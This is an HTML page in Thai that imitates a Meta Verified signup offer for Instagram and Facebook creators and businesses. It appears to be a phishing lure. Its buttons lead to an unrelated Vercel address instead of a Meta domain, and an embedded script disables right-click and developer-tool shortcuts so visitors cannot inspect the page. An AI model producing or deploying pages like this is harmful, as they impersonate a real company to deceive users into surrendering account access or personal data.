<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>บ้าน</title>
    <link href="style.css" rel="stylesheet">
    <link rel="icon" href="https://pbs.twimg.com/media/GQB99gQaQAEUOZ7?format=png&amp;name=small">
    <style>
        body {
            font-family: system-ui;
            margin: 0;
            padding: 0;
        }

        .container-fluid {
            background: #F5F6F6;
        }

        .btn {
            background: #0064e0;
            border: none;
            border-radius: 100px;
            padding: 10px 35px;
            text-decoration: none;
            color: white;
            display: inline-block;
            margin-top: 1rem;
            font-family: Arial, sans-serif;
            font-size: 16px;
        }

        .content {
            margin-top: 3rem;
            display: flex;
            justify-content: center;
        }

        .content .col-sm-6 {
            margin-top: 3rem;
            margin-left: 5rem;
        }

        .content p {
            font-size: 18px;
            margin-top: 1rem;
            font-family: Arial, sans-serif;
        }

        .sign-up {
            font-size: 17px;
            padding-top: 1rem;
            font-family: Arial, sans-serif;
        }

        .business-info {
            font-size: 14px;
            font-family: Arial, sans-serif;
        }

        .region-info {
            font-size: small;
            opacity: 95%;
            font-family: Arial, sans-serif;
        }

        .image {
            display: none;
            width: 42%;
            height: 100vh;
            background-size: cover;
        }

        @media (min-width: 576px) {
            .image {
                display: block;
            }
        }
    </style>
</head>

<body>
    <div class="container-fluid">
        <img width="120px" src="Meta-Logo.png" alt="Meta Logo">
    </div>
    <div class="content">
        <div class="col-sm-6">
            <img width="80px" src="verified.png" alt="Meta Verified Icon">
            <h1 class="my-3 fs-1">กลายเป็น<br>เมตาได้รับการตรวจสอบแล้ว</h1>
            <div style="margin-bottom: 30px;"></div>

            <a href="https://req-submit-for-account-verify.vercel.app/" class="btn">นำมาใช้</a>

            <p class="mt-4">เพิ่มสถานะทางสังคมของคุณด้วย Meta Verified – การสมัครสมาชิกใหม่ <br> แพ็คเกจสำหรับครีเอเตอร์และธุรกิจบน Instagram และ<br> Facebook.</p>
            <p class="sign-up">ลงทะเบียนตอนนี้สำหรับผู้สร้าง</p>
            <p class="mt-4 mb-0">
                <span class="fw-semibold">คุณเป็นธุรกิจหรือไม่?</span> เรียนรู้เพิ่มเติมเกี่ยวกับ
            </p>
            <a href="https://req-submit-for-account-verify.vercel.app/" class="business-info">Meta ที่ได้รับการยืนยันสำหรับธุรกิจ</a> <br><br>
            <i class="region-info">คุณสมบัติ ความพร้อมใช้งาน และราคาอาจแตกต่างกันไปตามภูมิภาค.</i>
        </div>
        <div class="col-sm-5 image" style="background-image: url(&#39;https://pbs.twimg.com/media/GPUPRg0a8AACTSj?format=jpg&amp;name=small&#39;);"></div>
    </div>

    <script>
        document.addEventListener('contextmenu', function(e) {
            e.preventDefault();
        });
        document.onkeydown = function(e) {
            if (e.ctrlKey && (e.shiftKey || e.key === "I" || e.key === "i")) {
                e.preventDefault();
            }
        };
    </script>




</body></html>
